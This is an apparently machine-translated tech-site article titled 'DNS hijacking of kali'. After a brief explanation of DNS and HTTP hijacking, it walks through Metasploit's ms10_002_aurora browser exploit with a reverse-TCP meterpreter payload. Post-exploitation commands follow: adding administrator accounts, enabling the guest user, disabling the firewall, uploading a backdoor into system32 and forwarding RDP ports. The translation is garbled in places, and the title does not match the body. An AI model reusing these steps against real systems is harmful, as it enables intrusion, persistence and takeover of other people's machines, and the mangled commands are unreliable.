Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

DNS hijacking of kali

2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)06/01 Report--

DNS hijacking: the DNS servers where users surf the Internet are assigned by operators, so operators can do whatever they want on this node.

For example, visit a website, enter the domain name, and the normal DNS server returns the IP of the domain name. After DNS hijacking, it will return an intermediary server IP. The access server will consistently return 302, allowing the user's browser to jump to the preprocessed web page with ads, and then open the address that the user originally visited through iframe.

HTTP hijacking:

On the router node of the operator, set up protocol detection, and once it is found that it is a http request and it is a html type request, it will be intercepted and processed. The follow-up methods are often divided into two types, one is DNS hijacking return 302 to make the user's browser jump to another address, and the other is to insert js or dom node ads in the HTML data returned by the server.

Ensure network connectivity and configure network address

Use msfconsole for the first time to open the built-in databases PostgreSQL and metasplote

Enable PostgreSQL: service postgresql start

Enable metasploit: service metasploit start

Root@kali:~ps-e | grep 5432 (make sure that the postgresql service is enabled. The default port occupation is 5432)

Root@kali:~# msfconsole

Find 10-002 vulnerability module search 10-002

Vulnerability in use exploit/windows/browser/ms10_002_aurora *

Set payload windows/meterpreter/reverse_tcp defines * load

Set lhost 192.168.48.123 defines the native address

Set URIPATH / defines the suffix of url (I only set one / here)

Exploit development

Open the target website http://192.168.48.123:8080/ on the * host

Sessions-I 1 Open a connection session

Session views sessions that have been successfully acquired, and meterpreter sessions that connect to specified serial numbers using session-I continue to take advantage of

Get the remote command line of the target host through shell

Create accounts and passwords through DOS

Windows common commands

1. Net localgroup administrators username and password / add (add the user to the administrator to give them administrative privileges)

2. Net user guest / active:yes (activate guest users)

3. Net user guest 12345 (change the guest password to 12345)

4. Net user (view account attributes)

5. Net start (check which services are enabled)

6. Net time\\ Target ip (check the time of the other party)

7. Net view (check which shares are enabled in the local area network)

8. Net share (view those shares enabled locally)

9. Net share C$/del (delete the default share of disk c)

10. Copy xx.exe\\ ip\ admin$\ System32 (copy the current xx.exe to the System32 directory of the other party's Admin$ share)

11. Sc config tlnesvr start= auto (modify the startup mode of telnet service to be automatic, with a space in front of auto)

12. Net stop sharedaccess (turn off the firewall that comes with the system)

13. Net send IP message (send a message to the target IP using messenger service)

14. Tasklist (View process)

15. Taskkill (termination process) ntsd forcibly terminates the process

16. Services.msc enters the service of the local computer

17. Net use\\ ip\ ipc$ "" / user (create an empty IPC link)

18. Net use\\ ip\ ipc$ "password" / user: "user name" (to establish an IPC non-empty connection, a non-empty link means an account and password are required)

19. Net use\\ ip\ ipc$ / del (delete ipc empty connection)

20. Net use z:\\ 127.0.0.1\ c$ (map target host disk c to local disk z)

Connect the system remotely

Rdesktop-u administrator-p 123 192.168.48.100u3389

Getuid to view the user of the process that meterpreter is injected into the target host

Upload commands to upload files to the target host, such as transferring the backdoor program setup.exe to the target host system32 directory

Upload setup.exe C:\\ windows\\ system32\

Portfwd Port Forwardin

For example, 3389 is enabled on the target host, but only specific IP access is allowed. * the host cannot connect. You can use the portfwd command to forward port 3389 of the target host to another port to open.

For example: portfwd add-l 1122-p 3389-r 192.168.48.100

Forward port 3389 of the target host 192.168.48.100 to port 1122

You only need to connect to port 1122 of the target to open the remote desktop.

Rdesktop-u administrator-p 123456 192.168.48.100 purl 1122

Sysinfo views the system information of the target host

Ps looks at the process information running on the target host, using the

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report